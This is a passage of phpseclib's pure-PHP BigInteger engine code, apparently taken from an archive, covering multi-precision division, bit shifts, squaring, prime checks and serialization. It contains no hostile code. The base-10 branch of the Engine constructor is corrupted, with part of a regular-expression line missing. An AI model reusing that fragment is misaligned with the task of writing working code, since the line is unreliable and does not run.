divideHelper(PHP $y) { if (count($y->value) == 1) { list($q, $r) = $this->divide_digit($this->value, $y->value[0]); $quotient = new static(); $remainder = new static(); $quotient->value = $q; $remainder->value = [$r]; $quotient->is_negative = $this->is_negative != $y->is_negative; return [$this->normalize($quotient), $this->normalize($remainder)]; } $x = clone $this; $y = clone $y; $x_sign = $x->is_negative; $y_sign = $y->is_negative; $x->is_negative = $y->is_negative = false; $diff = $x->compare($y); if (!$diff) { $temp = new static(); $temp->value = [1]; $temp->is_negative = $x_sign != $y_sign; return [$this->normalize($temp), $this->normalize(static::$zero[static::class])]; } if ($diff < 0) { // if $x is negative, "add" $y. if ($x_sign) { $x = $y->subtract($x); } return [$this->normalize(static::$zero[static::class]), $this->normalize($x)]; } // normalize $x and $y as described in HAC 14.23 / 14.24 $msb = $y->value[count($y->value) - 1]; for ($shift = 0; !($msb & static::MSB); ++$shift) { $msb <<= 1; } $x->lshift($shift); $y->lshift($shift); $y_value = &$y->value; $x_max = count($x->value) - 1; $y_max = count($y->value) - 1; $quotient = new static(); $quotient_value = &$quotient->value; $quotient_value = self::array_repeat(0, $x_max - $y_max + 1); static $temp, $lhs, $rhs; if (!isset($temp)) { $temp = new static(); $lhs = new static(); $rhs = new static(); } if (static::class != get_class($temp)) { $temp = new static(); $lhs = new static(); $rhs = new static(); } $temp_value = &$temp->value; $rhs_value = &$rhs->value; // $temp = $y << ($x_max - $y_max-1) in base 2**26 $temp_value = array_merge(self::array_repeat(0, $x_max - $y_max), $y_value); while ($x->compare($temp) >= 0) { // calculate the "common residue" ++$quotient_value[$x_max - $y_max]; $x = $x->subtract($temp); $x_max = count($x->value) - 1; } for ($i = $x_max; $i >= $y_max + 1; --$i) { $x_value = &$x->value; $x_window = [ isset($x_value[$i]) ? $x_value[$i] : 0, isset($x_value[$i - 1]) ? $x_value[$i - 1] : 0, isset($x_value[$i - 2]) ? $x_value[$i - 2] : 0 ]; $y_window = [ $y_value[$y_max], ($y_max > 0) ? $y_value[$y_max - 1] : 0 ]; $q_index = $i - $y_max - 1; if ($x_window[0] == $y_window[0]) { $quotient_value[$q_index] = static::MAX_DIGIT; } else { $quotient_value[$q_index] = self::safe_divide( $x_window[0] * static::BASE_FULL + $x_window[1], $y_window[0] ); } $temp_value = [$y_window[1], $y_window[0]]; $lhs->value = [$quotient_value[$q_index]]; $lhs = $lhs->multiply($temp); $rhs_value = [$x_window[2], $x_window[1], $x_window[0]]; while ($lhs->compare($rhs) > 0) { --$quotient_value[$q_index]; $lhs->value = [$quotient_value[$q_index]]; $lhs = $lhs->multiply($temp); } $adjust = self::array_repeat(0, $q_index); $temp_value = [$quotient_value[$q_index]]; $temp = $temp->multiply($y); $temp_value = &$temp->value; if (count($temp_value)) { $temp_value = array_merge($adjust, $temp_value); } $x = $x->subtract($temp); if ($x->compare(static::$zero[static::class]) < 0) { $temp_value = array_merge($adjust, $y_value); $x = $x->add($temp); --$quotient_value[$q_index]; } $x_max = count($x_value) - 1; } // unnormalize the remainder $x->rshift($shift); $quotient->is_negative = $x_sign != $y_sign; // calculate the "common residue", if appropriate if ($x_sign) { $y->rshift($shift); $x = $y->subtract($x); } return [$this->normalize($quotient), $this->normalize($x)]; } /** * Divides a BigInteger by a regular integer * * abc / x = a00 / x + b0 / x + c / x * * @param array $dividend * @param int $divisor * @return array */ private static function divide_digit(array $dividend, $divisor) { $carry = 0; $result = []; for ($i = count($dividend) - 1; $i >= 0; --$i) { $temp = static::BASE_FULL * $carry + $dividend[$i]; $result[$i] = self::safe_divide($temp, $divisor); $carry = (int)($temp - $divisor * $result[$i]); } return [$result, $carry]; } /** * Single digit division * * Even if int64 is being used the division operator will return a float64 value * if the dividend is not evenly divisible by the divisor. Since a float64 doesn't * have the precision of int64 this is a problem so, when int64 is being used, * we'll guarantee that the dividend is divisible by first subtracting the remainder. * * @param int $x * @param int $y * @return int */ private static function safe_divide($x, $y) { if (static::BASE === 26) { return (int)($x / $y); } // static::BASE === 31 /** @var int */ return ($x - ($x % $y)) / $y; } /** * Convert an array / boolean to a PHP BigInteger object * * @param array $arr * @return static */ protected function convertToObj(array $arr) { $result = new static(); $result->value = $arr[self::VALUE]; $result->is_negative = $arr[self::SIGN]; return $this->normalize($result); } /** * Normalize * * Removes leading zeros and truncates (if necessary) to maintain the appropriate precision * * @param PHP $result * @return static */ protected function normalize(PHP $result) { $result->precision = $this->precision; $result->bitmask = $this->bitmask; $value = &$result->value; if (!count($value)) { $result->is_negative = false; return $result; } $value = static::trim($value); if (!empty($result->bitmask->value)) { $length = min(count($value), count($result->bitmask->value)); $value = array_slice($value, 0, $length); for ($i = 0; $i < $length; ++$i) { $value[$i] = $value[$i] & $result->bitmask->value[$i]; } $value = static::trim($value); } return $result; } /** * Compares two numbers. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return int * @see static::compare() */ protected static function compareHelper(array $x_value, $x_negative, array $y_value, $y_negative) { if ($x_negative != $y_negative) { return (!$x_negative && $y_negative) ? 1 : -1; } $result = $x_negative ? -1 : 1; if (count($x_value) != count($y_value)) { return (count($x_value) > count($y_value)) ? $result : -$result; } $size = max(count($x_value), count($y_value)); $x_value = array_pad($x_value, $size, 0); $y_value = array_pad($y_value, $size, 0); for ($i = count($x_value) - 1; $i >= 0; --$i) { if ($x_value[$i] != $y_value[$i]) { return ($x_value[$i] > $y_value[$i]) ? $result : -$result; } } return 0; } /** * Absolute value. * * @return PHP */ public function abs() { $temp = new static(); $temp->value = $this->value; return $temp; } /** * Trim * * Removes leading zeros * * @param list $value * @return list */ protected static function trim(array $value) { for ($i = count($value) - 1; $i >= 0; --$i) { if ($value[$i]) { break; } unset($value[$i]); } return $value; } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return PHP */ public function bitwise_rightShift($shift) { $temp = new static(); // could just replace lshift with this, but then all lshift() calls would need to be rewritten // and I don't want to do that... $temp->value = $this->value; $temp->rshift($shift); return $this->normalize($temp); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return PHP */ public function bitwise_leftShift($shift) { $temp = new static(); // could just replace _rshift with this, but then all _lshift() calls would need to be rewritten // and I don't want to do that... $temp->value = $this->value; $temp->lshift($shift); return $this->normalize($temp); } /** * Converts 32-bit integers to bytes. * * @param int $x * @return string */ private static function int2bytes($x) { return ltrim(pack('N', $x), chr(0)); } /** * Array Repeat * * @param int $input * @param int $multiplier * @return array */ protected static function array_repeat($input, $multiplier) { return $multiplier ? array_fill(0, $multiplier, $input) : []; } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits. * * @param int $shift */ protected function lshift($shift) { if ($shift == 0) { return; } $num_digits = (int)($shift / static::BASE); $shift %= static::BASE; $shift = 1 << $shift; $carry = 0; for ($i = 0; $i < count($this->value); ++$i) { $temp = $this->value[$i] * $shift + $carry; $carry = static::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31); $this->value[$i] = (int)($temp - $carry * static::BASE_FULL); } if ($carry) { $this->value[count($this->value)] = $carry; } while ($num_digits--) { array_unshift($this->value, 0); } } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits. * * @param int $shift */ protected function rshift($shift) { if ($shift == 0) { return; } $num_digits = (int)($shift / static::BASE); $shift %= static::BASE; $carry_shift = static::BASE - $shift; $carry_mask = (1 << $shift) - 1; if ($num_digits) { $this->value = array_slice($this->value, $num_digits); } $carry = 0; for ($i = count($this->value) - 1; $i >= 0; --$i) { $temp = $this->value[$i] >> $shift | $carry; $carry = ($this->value[$i] & $carry_mask) << $carry_shift; $this->value[$i] = $temp; } $this->value = static::trim($this->value); } /** * Performs modular exponentiation. * * @param PHP $e * @param PHP $n * @return PHP */ protected function powModInner(PHP $e, PHP $n) { try { $class = static::$modexpEngine[static::class]; return $class::powModHelper($this, $e, $n, static::class); } catch (\Exception $err) { return PHP\DefaultEngine::powModHelper($this, $e, $n, static::class); } } /** * Performs squaring * * @param list $x * @return list */ protected static function square(array $x) { return count($x) < 2 * self::KARATSUBA_CUTOFF ? self::trim(self::baseSquare($x)) : self::trim(self::karatsubaSquare($x)); } /** * Performs traditional squaring on two BigIntegers * * Squaring can be done faster than multiplying a number by itself can be. See * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=7 HAC 14.2.4} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=141 MPM 5.3} for more information. * * @param array $value * @return array */ protected static function baseSquare(array $value) { if (empty($value)) { return []; } $square_value = self::array_repeat(0, 2 * count($value)); for ($i = 0, $max_index = count($value) - 1; $i <= $max_index; ++$i) { $i2 = $i << 1; $temp = $square_value[$i2] + $value[$i] * $value[$i]; $carry = static::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31); $square_value[$i2] = (int)($temp - static::BASE_FULL * $carry); // note how we start from $i+1 instead of 0 as we do in multiplication. for ($j = $i + 1, $k = $i2 + 1; $j <= $max_index; ++$j, ++$k) { $temp = $square_value[$k] + 2 * $value[$j] * $value[$i] + $carry; $carry = static::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31); $square_value[$k] = (int)($temp - static::BASE_FULL * $carry); } // the following line can yield values larger 2**15. at this point, PHP should switch // over to floats. $square_value[$i + $max_index + 1] = $carry; } return $square_value; } /** * Performs Karatsuba "squaring" on two BigIntegers * * See {@link http://en.wikipedia.org/wiki/Karatsuba_algorithm Karatsuba algorithm} and * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=151 MPM 5.3.4}. * * @param array $value * @return array */ protected static function karatsubaSquare(array $value) { $m = count($value) >> 1; if ($m < self::KARATSUBA_CUTOFF) { return self::baseSquare($value); } $x1 = array_slice($value, $m); $x0 = array_slice($value, 0, $m); $z2 = self::karatsubaSquare($x1); $z0 = self::karatsubaSquare($x0); $z1 = self::addHelper($x1, false, $x0, false); $z1 = self::karatsubaSquare($z1[self::VALUE]); $temp = self::addHelper($z2, false, $z0, false); $z1 = self::subtractHelper($z1, false, $temp[self::VALUE], false); $z2 = array_merge(array_fill(0, 2 * $m, 0), $z2); $z1[self::VALUE] = array_merge(array_fill(0, $m, 0), $z1[self::VALUE]); $xx = self::addHelper($z2, false, $z1[self::VALUE], $z1[self::SIGN]); $xx = self::addHelper($xx[self::VALUE], $xx[self::SIGN], $z0, false); return $xx[self::VALUE]; } /** * Make the current number odd * * If the current number is odd it'll be unchanged. If it's even, one will be added to it. * * @see self::randomPrime() */ protected function make_odd() { $this->value[0] |= 1; } /** * Test the number against small primes. * * @see self::isPrime() */ protected function testSmallPrimes() { if ($this->value == [1]) { return false; } if ($this->value == [2]) { return true; } if (~$this->value[0] & 1) { return false; } $value = $this->value; foreach (static::PRIMES as $prime) { list(, $r) = self::divide_digit($value, $prime); if (!$r) { return count($value) == 1 && $value[0] == $prime; } } return true; } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param PHP $r * @return int * @see self::isPrime() */ public static function scan1divide(PHP $r) { $r_value = &$r->value; for ($i = 0, $r_length = count($r_value); $i < $r_length; ++$i) { $temp = ~$r_value[$i] & static::MAX_DIGIT; for ($j = 1; ($temp >> $j) & 1; ++$j) { } if ($j <= static::BASE) { break; } } $s = static::BASE * $i + $j; $r->rshift($s); return $s; } /** * Performs exponentiation. * * @param PHP $n * @return PHP */ protected function powHelper(PHP $n) { if ($n->compare(static::$zero[static::class]) == 0) { return new static(1); } // n^0 = 1 $temp = clone $this; while (!$n->equals(static::$one[static::class])) { $temp = $temp->multiply($this); $n = $n->subtract(static::$one[static::class]); } return $temp; } /** * Is Odd? * * @return bool */ public function isOdd() { return (bool)($this->value[0] & 1); } /** * Tests if a bit is set * * @return bool */ public function testBit($x) { $digit = (int) floor($x / static::BASE); $bit = $x % static::BASE; if (!isset($this->value[$digit])) { return false; } return (bool)($this->value[$digit] & (1 << $bit)); } /** * Is Negative? * * @return bool */ public function isNegative() { return $this->is_negative; } /** * Negate * * Given $k, returns -$k * * @return static */ public function negate() { $temp = clone $this; $temp->is_negative = !$temp->is_negative; return $temp; } /** * Bitwise Split * * Splits BigInteger's into chunks of $split bits * * @param int $split * @return list */ public function bitwise_split($split) { if ($split < 1) { throw new \RuntimeException('Offset must be greater than 1'); } $width = (int)($split / static::BASE); if (!$width) { $arr = $this->bitwise_small_split($split); return array_map(function ($digit) { $temp = new static(); $temp->value = $digit != 0 ? [$digit] : []; return $temp; }, $arr); } $vals = []; $val = $this->value; $i = $overflow = 0; $len = count($val); while ($i < $len) { $digit = []; if (!$overflow) { $digit = array_slice($val, $i, $width); $i += $width; $overflow = $split % static::BASE; if ($overflow) { $mask = (1 << $overflow) - 1; $temp = isset($val[$i]) ? $val[$i] : 0; $digit[] = $temp & $mask; } } else { $remaining = static::BASE - $overflow; $tempsplit = $split - $remaining; $tempwidth = (int)($tempsplit / static::BASE + 1); $digit = array_slice($val, $i, $tempwidth); $i += $tempwidth; $tempoverflow = $tempsplit % static::BASE; if ($tempoverflow) { $tempmask = (1 << $tempoverflow) - 1; $temp = isset($val[$i]) ? $val[$i] : 0; $digit[] = $temp & $tempmask; } $newbits = 0; for ($j = count($digit) - 1; $j >= 0; $j--) { $temp = $digit[$j] & $mask; $digit[$j] = ($digit[$j] >> $overflow) | ($newbits << $remaining); $newbits = $temp; } $overflow = $tempoverflow; $mask = $tempmask; } $temp = new static(); $temp->value = static::trim($digit); $vals[] = $temp; } return array_reverse($vals); } /** * Bitwise Split where $split < static::BASE * * @param int $split * @return list */ private function bitwise_small_split($split) { $vals = []; $val = $this->value; $mask = (1 << $split) - 1; $i = $overflow = 0; $len = count($val); $val[] = 0; $remaining = static::BASE; while ($i != $len) { $digit = $val[$i] & $mask; $val[$i] >>= $split; if (!$overflow) { $remaining -= $split; $overflow = $split <= $remaining ? 0 : $split - $remaining; if (!$remaining) { $i++; $remaining = static::BASE; $overflow = 0; } } elseif (++$i != $len) { $tempmask = (1 << $overflow) - 1; $digit |= ($val[$i] & $tempmask) << $remaining; $val[$i] >>= $overflow; $remaining = static::BASE - $overflow; $overflow = $split <= $remaining ? 0 : $split - $remaining; } $vals[] = $digit; } while ($vals[count($vals) - 1] == 0) { unset($vals[count($vals) - 1]); } return array_reverse($vals); } /** * @return bool */ protected static function testJITOnWindows() { // see https://github.com/php/php-src/issues/11917 if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' && function_exists('opcache_get_status') && PHP_VERSION_ID < 80213 && !defined('PHPSECLIB_ALLOW_JIT')) { $status = opcache_get_status(); if ($status && isset($status['jit']) && $status['jit']['enabled'] && $status['jit']['on']) { return true; } } return false; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP64.php000064400000021725147600400120023572 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines; /** * Pure-PHP 64-bit Engine. * * Uses 64-bit integers if int size is 8 bits * * @author Jim Wigginton */ class PHP64 extends PHP { // Constants used by PHP.php const BASE = 31; const BASE_FULL = 0x80000000; const MAX_DIGIT = 0x7FFFFFFF; const MSB = 0x40000000; /** * MAX10 in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10 = 1000000000; /** * MAX10LEN in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10LEN = 9; const MAX_DIGIT2 = 4611686018427387904; /** * Initialize a PHP64 BigInteger Engine instance * * @param int $base * @see parent::initialize() */ protected function initialize($base) { if ($base != 256 && $base != -256) { return parent::initialize($base); } $val = $this->value; $this->value = []; $vals = &$this->value; $i = strlen($val); if (!$i) { return; } while (true) { $i -= 4; if ($i < 0) { if ($i == -4) { break; } $val = substr($val, 0, 4 + $i); $val = str_pad($val, 4, "\0", STR_PAD_LEFT); if ($val == "\0\0\0\0") { break; } $i = 0; } list(, $digit) = unpack('N', substr($val, $i, 4)); $step = count($vals) & 7; if (!$step) { $digit &= static::MAX_DIGIT; $i++; } else { $shift = 8 - $step; $digit >>= $shift; $shift = 32 - $shift; $digit &= (1 << $shift) - 1; $temp = $i > 0 ? ord($val[$i - 1]) : 0; $digit |= ($temp << $shift) & 0x7F000000; } $vals[] = $digit; } while (end($vals) === 0) { array_pop($vals); } reset($vals); } /** * Test for engine validity * * @see parent::__construct() * @return bool */ public static function isValidEngine() { return PHP_INT_SIZE >= 8 && !self::testJITOnWindows(); } /** * Adds two BigIntegers. * * @param PHP64 $y * @return PHP64 */ public function add(PHP64 $y) { $temp = self::addHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Subtracts two BigIntegers. * * @param PHP64 $y * @return PHP64 */ public function subtract(PHP64 $y) { $temp = self::subtractHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Multiplies two BigIntegers. * * @param PHP64 $y * @return PHP64 */ public function multiply(PHP64 $y) { $temp = self::multiplyHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param PHP64 $y * @return array{PHP64, PHP64} */ public function divide(PHP64 $y) { return $this->divideHelper($y); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP64 $n * @return false|PHP64 */ public function modInverse(PHP64 $n) { return $this->modInverseHelper($n); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP64 $n * @return PHP64[] */ public function extendedGCD(PHP64 $n) { return $this->extendedGCDHelper($n); } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param PHP64 $n * @return PHP64 */ public function gcd(PHP64 $n) { return $this->extendedGCD($n)['gcd']; } /** * Logical And * * @param PHP64 $x * @return PHP64 */ public function bitwise_and(PHP64 $x) { return $this->bitwiseAndHelper($x); } /** * Logical Or * * @param PHP64 $x * @return PHP64 */ public function bitwise_or(PHP64 $x) { return $this->bitwiseOrHelper($x); } /** * Logical Exclusive Or * * @param PHP64 $x * @return PHP64 */ public function bitwise_xor(PHP64 $x) { return $this->bitwiseXorHelper($x); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this is * demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param PHP64 $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(PHP64 $y) { return parent::compareHelper($this->value, $this->is_negative, $y->value, $y->is_negative); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param PHP64 $x * @return bool */ public function equals(PHP64 $x) { return $this->value === $x->value && $this->is_negative == $x->is_negative; } /** * Performs modular exponentiation. * * @param PHP64 $e * @param PHP64 $n * @return PHP64 */ public function modPow(PHP64 $e, PHP64 $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param PHP64 $e * @param PHP64 $n * @return PHP64|false */ public function powMod(PHP64 $e, PHP64 $n) { return $this->powModOuter($e, $n); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param PHP64 $min * @param PHP64 $max * @return false|PHP64 */ public static function randomRangePrime(PHP64 $min, PHP64 $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param PHP64 $min * @param PHP64 $max * @return PHP64 */ public static function randomRange(PHP64 $min, PHP64 $max) { return self::randomRangeHelper($min, $max); } /** * Performs exponentiation. * * @param PHP64 $n * @return PHP64 */ public function pow(PHP64 $n) { return $this->powHelper($n); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param PHP64 ...$nums * @return PHP64 */ public static function min(PHP64 ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param PHP64 ...$nums * @return PHP64 */ public static function max(PHP64 ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param PHP64 $min * @param PHP64 $max * @return bool */ public function between(PHP64 $min, PHP64 $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/Engine.php000064400000113212147600400120024167 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Random; use phpseclib3\Exception\BadConfigurationException; use phpseclib3\Math\BigInteger; /** * Base Engine. * * @author Jim Wigginton */ abstract class Engine implements \JsonSerializable { /* final protected */ const PRIMES = [ 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997, ]; /** * BigInteger(0) * * @var array, static> */ protected static $zero = []; /** * BigInteger(1) * * @var array, static> */ protected static $one = []; /** * BigInteger(2) * * @var array, static> */ protected static $two = []; /** * Modular Exponentiation Engine * * @var array, class-string> */ protected static $modexpEngine; /** * Engine Validity Flag * * @var array, bool> */ protected static $isValidEngine; /** * Holds the BigInteger's value * * @var \GMP|string|array|int */ protected $value; /** * Holds the BigInteger's sign * * @var bool */ protected $is_negative; /** * Precision * * @see static::setPrecision() * @var int */ protected $precision = -1; /** * Precision Bitmask * * @see static::setPrecision() * @var static|false */ protected $bitmask = false; /** * Recurring Modulo Function * * @var callable */ protected $reduce; /** * Mode independent value used for serialization. * * @see self::__sleep() * @see self::__wakeup() * @var string */ protected $hex; /** * Default constructor * * @param int|numeric-string $x integer Base-10 number or base-$base number if $base set. * @param int $base */ public function __construct($x = 0, $base = 10) { if (!array_key_exists(static::class, static::$zero)) { static::$zero[static::class] = null; // Placeholder to prevent infinite loop. static::$zero[static::class] = new static(0); static::$one[static::class] = new static(1); static::$two[static::class] = new static(2); } // '0' counts as empty() but when the base is 256 '0' is equal to ord('0') or 48 // '0' is the only value like this per http://php.net/empty if (empty($x) && (abs($base) != 256 || $x !== '0')) { return; } switch ($base) { case -256: case 256: if ($base == -256 && (ord($x[0]) & 0x80)) { $this->value = ~$x; $this->is_negative = true; } else { $this->value = $x; $this->is_negative = false; } $this->initialize($base); if ($this->is_negative) { $temp = $this->add(new static('-1')); $this->value = $temp->value; } break; case -16: case 16: if ($base > 0 && $x[0] == '-') { $this->is_negative = true; $x = substr($x, 1); } $x = preg_replace('#^(?:0x)?([A-Fa-f0-9]*).*#s', '$1', $x); $is_negative = false; if ($base < 0 && hexdec($x[0]) >= 8) { $this->is_negative = $is_negative = true; $x = Strings::bin2hex(~Strings::hex2bin($x)); } $this->value = $x; $this->initialize($base); if ($is_negative) { $temp = $this->add(new static('-1')); $this->value = $temp->value; } break; case -10: case 10: // (?value = preg_replace('#(?value) || $this->value == '-') { $this->value = '0'; } $this->initialize($base); break; case -2: case 2: if ($base > 0 && $x[0] == '-') { $this->is_negative = true; $x = substr($x, 1); } $x = preg_replace('#^([01]*).*#s', '$1', $x); $temp = new static(Strings::bits2bin($x), 128 * $base); // ie. either -16 or +16 $this->value = $temp->value; if ($temp->is_negative) { $this->is_negative = true; } break; default: // base not supported, so we'll let $this == 0 } } /** * Sets engine type. * * Throws an exception if the type is invalid * * @param class-string $engine */ public static function setModExpEngine($engine) { $fqengine = '\\phpseclib3\\Math\\BigInteger\\Engines\\' . static::ENGINE_DIR . '\\' . $engine; if (!class_exists($fqengine) || !method_exists($fqengine, 'isValidEngine')) { throw new \InvalidArgumentException("$engine is not a valid engine"); } if (!$fqengine::isValidEngine()) { throw new BadConfigurationException("$engine is not setup correctly on this system"); } static::$modexpEngine[static::class] = $fqengine; } /** * Converts a BigInteger to a byte string (eg. base-256). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * @return string */ protected function toBytesHelper() { $comparison = $this->compare(new static()); if ($comparison == 0) { return $this->precision > 0 ? str_repeat(chr(0), ($this->precision + 1) >> 3) : ''; } $temp = $comparison < 0 ? $this->add(new static(1)) : $this; $bytes = $temp->toBytes(); if (!strlen($bytes)) { // eg. if the number we're trying to convert is -1 $bytes = chr(0); } if (ord($bytes[0]) & 0x80) { $bytes = chr(0) . $bytes; } return $comparison < 0 ? ~$bytes : $bytes; } /** * Converts a BigInteger to a hex string (eg. base-16). * * @param bool $twos_compliment * @return string */ public function toHex($twos_compliment = false) { return Strings::bin2hex($this->toBytes($twos_compliment)); } /** * Converts a BigInteger to a bit string (eg. base-2). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * * @param bool $twos_compliment * @return string */ public function toBits($twos_compliment = false) { $hex = $this->toBytes($twos_compliment); $bits = Strings::bin2bits($hex); $result = $this->precision > 0 ? substr($bits, -$this->precision) : ltrim($bits, '0'); if ($twos_compliment && $this->compare(new static()) > 0 && $this->precision <= 0) { return '0' . $result; } return $result; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * {@internal See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=21 HAC 14.64} for more information.} * * @param Engine $n * @return static|false */ protected function modInverseHelper(Engine $n) { // $x mod -$n == $x mod $n. $n = $n->abs(); if ($this->compare(static::$zero[static::class]) < 0) { $temp = $this->abs(); $temp = $temp->modInverse($n); return $this->normalize($n->subtract($temp)); } extract($this->extendedGCD($n)); /** * @var Engine $gcd * @var Engine $x */ if (!$gcd->equals(static::$one[static::class])) { return false; } $x = $x->compare(static::$zero[static::class]) < 0 ? $x->add($n) : $x; return $this->compare(static::$zero[static::class]) < 0 ? $this->normalize($n->subtract($x)) : $this->normalize($x); } /** * Serialize * * Will be called, automatically, when serialize() is called on a BigInteger object. * * @return array */ public function __sleep() { $this->hex = $this->toHex(true); $vars = ['hex']; if ($this->precision > 0) { $vars[] = 'precision'; } return $vars; } /** * Serialize * * Will be called, automatically, when unserialize() is called on a BigInteger object. * * @return void */ public function __wakeup() { $temp = new static($this->hex, -16); $this->value = $temp->value; $this->is_negative = $temp->is_negative; if ($this->precision > 0) { // recalculate $this->bitmask $this->setPrecision($this->precision); } } /** * JSON Serialize * * Will be called, automatically, when json_encode() is called on a BigInteger object. * * @return array{hex: string, precision?: int] */ #[\ReturnTypeWillChange] public function jsonSerialize() { $result = ['hex' => $this->toHex(true)]; if ($this->precision > 0) { $result['precision'] = $this->precision; } return $result; } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function __toString() { return $this->toString(); } /** * __debugInfo() magic method * * Will be called, automatically, when print_r() or var_dump() are called * * @return array */ public function __debugInfo() { $result = [ 'value' => '0x' . $this->toHex(true), 'engine' => basename(static::class) ]; return $this->precision > 0 ? $result + ['precision' => $this->precision] : $result; } /** * Set Precision * * Some bitwise operations give different results depending on the precision being used. Examples include left * shift, not, and rotates. * * @param int $bits */ public function setPrecision($bits) { if ($bits < 1) { $this->precision = -1; $this->bitmask = false; return; } $this->precision = $bits; $this->bitmask = static::setBitmask($bits); $temp = $this->normalize($this); $this->value = $temp->value; } /** * Get Precision * * Returns the precision if it exists, -1 if it doesn't * * @return int */ public function getPrecision() { return $this->precision; } /** * Set Bitmask * @return static * @param int $bits * @see self::setPrecision() */ protected static function setBitmask($bits) { return new static(chr((1 << ($bits & 0x7)) - 1) . str_repeat(chr(0xFF), $bits >> 3), 256); } /** * Logical Not * * @return Engine|string */ public function bitwise_not() { // calculuate "not" without regard to $this->precision // (will always result in a smaller number. ie. ~1 isn't 1111 1110 - it's 0) $temp = $this->toBytes(); if ($temp == '') { return $this->normalize(static::$zero[static::class]); } $pre_msb = decbin(ord($temp[0])); $temp = ~$temp; $msb = decbin(ord($temp[0])); if (strlen($msb) == 8) { $msb = substr($msb, strpos($msb, '0')); } $temp[0] = chr(bindec($msb)); // see if we need to add extra leading 1's $current_bits = strlen($pre_msb) + 8 * strlen($temp) - 8; $new_bits = $this->precision - $current_bits; if ($new_bits <= 0) { return $this->normalize(new static($temp, 256)); } // generate as many 